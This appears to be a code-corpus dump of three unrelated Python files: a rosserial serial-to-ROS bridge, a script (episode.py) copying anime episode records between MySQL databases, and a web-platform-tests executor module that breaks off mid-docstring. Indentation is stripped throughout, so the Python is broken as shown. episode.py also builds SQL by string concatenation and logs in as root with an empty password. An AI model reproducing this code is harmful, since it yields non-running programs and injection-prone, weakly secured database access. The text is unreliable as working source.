from serial import *
import StringIO
from std_msgs.msg import Time
from rosserial_msgs.msg import *
from rosserial_msgs.srv import *
import diagnostic_msgs.msg
import socket
import time
import struct
import signal
def load_pkg_module(package, directory):
#check if its in the python path
path = sys.path
try:
imp.find_module(package)
except:
roslib.load_manifest(package)
try:
m = __import__( package + '.' + directory )
except:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
def load_service(package,service):
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
srv = getattr(s, service)
mreq = getattr(s, service+"Request")
mres = getattr(s, service+"Response")
return srv,mreq,mres
class Publisher:
"""
Publisher forwards messages from the serial device to ROS.
"""
def __init__(self, topic_info):
""" Create a new publisher. """
self.topic = topic_info.topic_name
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.publisher = rospy.Publisher(self.topic, self.message, queue_size=10)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def handlePacket(self, data):
""" Forward message to ROS network. """
m = self.message()
m.deserialize(data)
self.publisher.publish(m)
class Subscriber:
"""
Subscriber forwards messages from ROS to the serial device.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.id = topic_info.topic_id
self.parent = parent
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.subscriber = rospy.Subscriber(self.topic, self.message, self.callback)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def unregister(self):
rospy.loginfo("Removing subscriber: %s", self.topic)
self.subscriber.unregister()
def callback(self, msg):
""" Forward message to serial device. """
data_buffer = StringIO.StringIO()
msg.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
def unregister(self):
self.subscriber.unregister()
class ServiceServer:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
self.service = rospy.Service(self.topic, srv, self.callback)
# response message
self.data = None
def unregister(self):
rospy.loginfo("Removing service: %s", self.topic)
self.service.shutdown()
def callback(self, req):
""" Forward request to serial device. """
data_buffer = StringIO.StringIO()
req.serialize(data_buffer)
self.response = None
if self.parent.send(self.id, data_buffer.getvalue()) >= 0:
while self.response == None:
pass
return self.response
def handlePacket(self, data):
""" Forward response to ROS network. """
r = self.mres()
r.deserialize(data)
self.response = r
class ServiceClient:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
rospy.loginfo("Starting service client, waiting for service '" + self.topic + "'")
rospy.wait_for_service(self.topic)
self.proxy = rospy.ServiceProxy(self.topic, srv)
def handlePacket(self, data):
""" Forward request to ROS network. """
req = self.mreq()
req.deserialize(data)
# call service proxy
resp = self.proxy(req)
# serialize and publish
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
class RosSerialServer:
"""
RosSerialServer waits for a socket connection then passes itself, forked as a
new process, to SerialClient which uses it as a serial port. It continues to listen
for additional connections. Each forked process is a new ros node, and proxies ros
operations (e.g. publish/subscribe) from its connection to the rest of ros.
"""
def __init__(self, tcp_portnum, fork_server=False):
print "Fork_server is: ", fork_server
self.tcp_portnum = tcp_portnum
self.fork_server = fork_server
def listen(self):
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#bind the socket to a public host, and a well-known port
self.serversocket.bind(("", self.tcp_portnum)) #become a server socket
self.serversocket.listen(1)
while True:
#accept connections
print "waiting for socket connection"
(clientsocket, address) = self.serversocket.accept()
#now do something with the clientsocket
rospy.loginfo("Established a socket connection from %s on port %s" % (address))
self.socket = clientsocket
self.isConnected = True
if (self.fork_server == True): # if configured to launch server in a separate process
rospy.loginfo("Forking a socket server process")
process = multiprocessing.Process(target=self.startSocketServer, args=(address))
process.daemon = True
process.start()
rospy.loginfo("launched startSocketServer")
else:
rospy.loginfo("calling startSerialClient")
self.startSerialClient()
rospy.loginfo("startSerialClient() exited")
def startSerialClient(self):
client = SerialClient(self)
try:
client.run()
except KeyboardInterrupt:
pass
except RuntimeError:
rospy.loginfo("RuntimeError exception caught")
self.isConnected = False
except socket.error:
rospy.loginfo("socket.error exception caught")
self.isConnected = False
finally:
self.socket.close()
for sub in client.subscribers.values():
sub.unregister()
for srv in client.services.values():
srv.unregister()
#pass
def startSocketServer(self, port, address):
rospy.loginfo("starting ROS Serial Python Node serial_node-%r" % (address,))
rospy.init_node("serial_node_%r" % (address,))
self.startSerialClient()
def flushInput(self):
pass
def write(self, data):
if (self.isConnected == False):
return
length = len(data)
totalsent = 0
while totalsent < length:
sent = self.socket.send(data[totalsent:])
if sent == 0:
raise RuntimeError("RosSerialServer.write() socket connection broken")
totalsent = totalsent + sent
def read(self, rqsted_length):
self.msg = ''
if (self.isConnected == False):
return self.msg
while len(self.msg) < rqsted_length:
chunk = self.socket.recv(rqsted_length - len(self.msg))
if chunk == '':
raise RuntimeError("RosSerialServer.read() socket connection broken")
self.msg = self.msg + chunk
return self.msg
def close(self):
self.port.close()
def inWaiting(self):
try: # the caller checks just for <1, so we'll peek at just one byte
chunk = self.socket.recv(1, socket.MSG_DONTWAIT|socket.MSG_PEEK)
if chunk == '':
raise RuntimeError("RosSerialServer.inWaiting() socket connection broken")
return len(chunk)
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
return 0
raise
class SerialClient:
"""
ServiceServer responds to requests from the serial device.
"""
def __init__(self, port=None, baud=57600, timeout=5.0):
""" Initialize node, connect to bus, attempt to negotiate topics. """
self.mutex = thread.allocate_lock()
self.lastsync = rospy.Time(0)
self.lastsync_lost = rospy.Time(0)
self.timeout = timeout
self.synced = False
self.pub_diagnostics = rospy.Publisher('/diagnostics', diagnostic_msgs.msg.DiagnosticArray, queue_size=10)
if port== None:
# no port specified, listen for any new port?
pass
elif hasattr(port, 'read'):
#assume its a filelike object
self.port=port
else:
# open a specific port
try:
self.port = Serial(port, baud, timeout=self.timeout*0.5)
except SerialException as e:
rospy.logerr("Error opening serial: %s", e)
rospy.signal_shutdown("Error opening serial: %s" % e)
raise SystemExit
self.port.timeout = 0.01 # Edit the port timeout
time.sleep(0.1) # Wait for ready (patch for Uno)
# hydro introduces protocol ver2 which must match node_handle.h
# The protocol version is sent as the 2nd sync byte emitted by each end
self.protocol_ver1 = '\xff'
self.protocol_ver2 = '\xfe'
self.protocol_ver = self.protocol_ver2
self.publishers = dict() # id:Publishers
self.subscribers = dict() # topic:Subscriber
self.services = dict() # topic:Service
self.buffer_out = -1
self.buffer_in = -1
self.callbacks = dict()
# endpoints for creating new pubs/subs
self.callbacks[TopicInfo.ID_PUBLISHER] = self.setupPublisher
self.callbacks[TopicInfo.ID_SUBSCRIBER] = self.setupSubscriber
# service client/servers have 2 creation endpoints (a publisher and a subscriber)
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_PUBLISHER] = self.setupServiceServerPublisher
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_SUBSCRIBER] = self.setupServiceServerSubscriber
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_PUBLISHER] = self.setupServiceClientPublisher
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_SUBSCRIBER] = self.setupServiceClientSubscriber
# custom endpoints
self.callbacks[TopicInfo.ID_PARAMETER_REQUEST] = self.handleParameterRequest
self.callbacks[TopicInfo.ID_LOG] = self.handleLoggingRequest
self.callbacks[TopicInfo.ID_TIME] = self.handleTimeRequest
rospy.sleep(2.0) # TODO
self.requestTopics()
self.lastsync = rospy.Time.now()
signal.signal(signal.SIGINT, self.txStopRequest)
def requestTopics(self):
""" Determine topics to subscribe/publish. """
self.port.flushInput()
# request topic sync
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x00\x00\xff")
def txStopRequest(self, signal, frame):
""" send stop tx request to arduino when receive SIGINT(Ctrl-c)"""
self.port.flushInput()
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x0b\x00\xf4")
# tx_stop_request is x0b
rospy.loginfo("Send tx stop request")
sys.exit(0)
def tryRead(self, length):
try:
bytes_read = self.port.read(length)
if len(bytes_read) < length:
rospy.logwarn("Serial Port read returned short (expected %d bytes, received %d instead)."
% (length, len(bytes_read)))
raise IOError()
return bytes_read
except Exception as e:
rospy.logwarn("Serial Port read failure: %s", e)
raise IOError()
def run(self):
""" Forward recieved messages to appropriate publisher. """
data = ''
while not rospy.is_shutdown():
if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):
if (self.synced == True):
rospy.logerr("Lost sync with device, restarting...")
else:
rospy.logerr("Unable to sync with device; possible link problem or link software version mismatch such as hydro rosserial_python with groovy Arduino")
self.lastsync_lost = rospy.Time.now()
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "no sync with device")
self.requestTopics()
self.lastsync = rospy.Time.now()
# This try-block is here because we make multiple calls to read(). Any one of them can throw
# an IOError if there's a serial problem or timeout. In that scenario, a single handler at the
# bottom attempts to reconfigure the topics.
try:
if self.port.inWaiting() < 1:
time.sleep(0.001)
continue
flag = [0,0]
flag[0] = self.tryRead(1)
if (flag[0] != '\xff'):
continue
flag[1] = self.tryRead(1)
if ( flag[1] != self.protocol_ver):
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
rospy.logerr("Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
protocol_ver_msgs = {'\xff': 'Rev 0 (rosserial 0.4 and earlier)', '\xfe': 'Rev 1 (rosserial 0.5+)', '\xfd': 'Some future rosserial version'}
if (flag[1] in protocol_ver_msgs):
found_ver_msg = 'Protocol version of client is ' + protocol_ver_msgs[flag[1]]
else:
found_ver_msg = "Protocol version of client is unrecognized"
rospy.loginfo("%s, expected %s" % (found_ver_msg, protocol_ver_msgs[self.protocol_ver]))
continue
msg_len_bytes = self.tryRead(2)
msg_length, = struct.unpack("<h", msg_len_bytes)
msg_len_chk = self.tryRead(1)
msg_len_checksum = sum(map(ord, msg_len_bytes)) + ord(msg_len_chk)
if msg_len_checksum % 256 != 255:
rospy.loginfo("wrong checksum for msg length, length %d" %(msg_length))
rospy.loginfo("chk is %d" % ord(msg_len_chk))
continue
# topic id (2 bytes)
topic_id_header = self.tryRead(2)
topic_id, = struct.unpack("<h", topic_id_header)
try:
msg = self.tryRead(msg_length)
except IOError:
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Packet Failed : Failed to read msg data")
rospy.loginfo("Packet Failed : Failed to read msg data")
rospy.loginfo("msg len is %d",len(msg))
raise
# checksum for topic id and msg
chk = self.tryRead(1)
checksum = sum(map(ord, topic_id_header) ) + sum(map(ord, msg)) + ord(chk)
if checksum % 256 == 255:
self.synced = True
try:
self.callbacks[topic_id](msg)
except KeyError:
rospy.logerr("Tried to publish before configured, topic id %d" % topic_id)
rospy.sleep(0.001)
else:
rospy.loginfo("wrong checksum for topic id and msg")
except IOError:
# One of the read calls had an issue. Just to be safe, request that the client
# reinitialize their topics.
self.requestTopics()
def setPublishSize(self, bytes):
if self.buffer_out < 0:
self.buffer_out = bytes
rospy.loginfo("Note: publish buffer size is %d bytes" % self.buffer_out)
def setSubscribeSize(self, bytes):
if self.buffer_in < 0:
self.buffer_in = bytes
rospy.loginfo("Note: subscribe buffer size is %d bytes" % self.buffer_in)
def setupPublisher(self, data):
""" Register a new publisher. """
try:
msg = TopicInfo()
msg.deserialize(data)
pub = Publisher(msg)
self.publishers[msg.topic_id] = pub
self.callbacks[msg.topic_id] = pub.handlePacket
self.setPublishSize(msg.buffer_size)
rospy.loginfo("Setup publisher on %s [%s]" % (msg.topic_name, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of publisher failed: %s", e)
def setupSubscriber(self, data):
""" Register a new subscriber. """
try:
msg = TopicInfo()
msg.deserialize(data)
if not msg.topic_name in self.subscribers.keys():
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Setup subscriber on %s [%s]" % (msg.topic_name, msg.message_type) )
elif msg.message_type != self.subscribers[msg.topic_name].message._type:
old_message_type = self.subscribers[msg.topic_name].message._type
self.subscribers[msg.topic_name].unregister()
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Change the message type of subscriber on %s from [%s] to [%s]" % (msg.topic_name, old_message_type, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of subscriber failed: %s", e)
def setupServiceServerPublisher(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceServerSubscriber(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceClientPublisher(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def setupServiceClientSubscriber(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def handleTimeRequest(self, data):
""" Respond to device with system time. """
t = Time()
t.data = rospy.Time.now()
data_buffer = StringIO.StringIO()
t.serialize(data_buffer)
self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )
self.lastsync = rospy.Time.now()
def handleParameterRequest(self, data):
""" Send parameters to device. Supports only simple datatypes and arrays of such. """
req = RequestParamRequest()
req.deserialize(data)
resp = RequestParamResponse()
try:
param = rospy.get_param(req.name)
except KeyError:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if param == None:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if (type(param) == dict):
rospy.logerr("Cannot send param %s because it is a dictionary"%req.name)
return
if (type(param) != list):
param = [param]
#check to make sure that all parameters in list are same type
t = type(param[0])
for p in param:
if t!= type(p):
rospy.logerr('All Paramers in the list %s must be of the same type'%req.name)
return
if (t == int):
resp.ints= param
if (t == float):
resp.floats=param
if (t == str):
resp.strings = param
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.send(TopicInfo.ID_PARAMETER_REQUEST, data_buffer.getvalue())
def handleLoggingRequest(self, data):
""" Forward logging information from serial device into ROS. """
msg = Log()
msg.deserialize(data)
if (msg.level == Log.ROSDEBUG):
rospy.logdebug(msg.msg)
elif(msg.level== Log.INFO):
rospy.loginfo(msg.msg)
elif(msg.level== Log.WARN):
rospy.logwarn(msg.msg)
elif(msg.level== Log.ERROR):
rospy.logerr(msg.msg)
elif(msg.level==Log.FATAL):
rospy.logfatal(msg.msg)
def send(self, topic, msg):
""" Send a message on a particular topic to the device. """
with self.mutex:
length = len(msg)
if self.buffer_in > 0 and length > self.buffer_in:
rospy.logerr("Message from ROS network dropped: message larger than buffer.")
print msg
return -1
else:
#modified frame : header(2 bytes) + msg_len(2 bytes) + msg_len_chk(1 byte) + topic_id(2 bytes) + msg(x bytes) + msg_topic_id_chk(1 byte)
# second byte of header is protocol version
msg_len_checksum = 255 - ( ((length&255) + (length>>8))%256 )
msg_checksum = 255 - ( ((topic&255) + (topic>>8) + sum([ord(x) for x in msg]))%256 )
data = "\xff" + self.protocol_ver + chr(length&255) + chr(length>>8) + chr(msg_len_checksum) + chr(topic&255) + chr(topic>>8)
data = data + msg + chr(msg_checksum)
self.port.write(data)
return length
def sendDiagnostics(self, level, msg_text):
msg = diagnostic_msgs.msg.DiagnosticArray()
status = diagnostic_msgs.msg.DiagnosticStatus()
status.name = "rosserial_python"
msg.header.stamp = rospy.Time.now()
msg.status.append(status)
status.message = msg_text
status.level = level
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[0].key="last sync"
if self.lastsync.to_sec()>0:
status.values[0].value=time.ctime(self.lastsync.to_sec())
else:
status.values[0].value="never"
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[1].key="last sync lost"
status.values[1].value=time.ctime(self.lastsync_lost.to_sec())
self.pub_diagnostics.publish(msg)
|
episode.py
|
import time
import pymysql
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
db1 = pymysql.connect("localhost", "root", "", "bidscore")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
def getbangumiid(animate_id, bangumi_id, m):
sql2 = "select * from bidscore.episode where id=" + bangumi_id
cursor_b.execute(sql2)
items_b = cursor_b.fetchall()
for item_b in items_b:
no = item_b["no"]
title=item_b["title"]
sql1 = "insert into miraihyoka.episode(animate_id, name,no) value (%s,%s,%s)"
args = (animate_id, title,no)
cursor_m.execute(sql1, args)
db2.commit()
print("-----------------已插入" + str(m) + "条-----------------")
if __name__ == '__main__':
sql1 = "select * from animate"
db2.ping(reconnect=True)
cursor_m.execute(sql1)
items_m = cursor_m.fetchall()
nnn = 0
aa=Pool(30)
for item_m in items_m:
an = item_m["animate_id"]
bid = item_m["bangumi_idid"]
if bid is not None:
nnn += 1
aa.apply(getbangumiid, args=(an, bid, nnn))
# p = Process(target=getbangumiid, args=(an, bid, nnn))
# p.start()
aa.close()
aa.join()
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, async=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
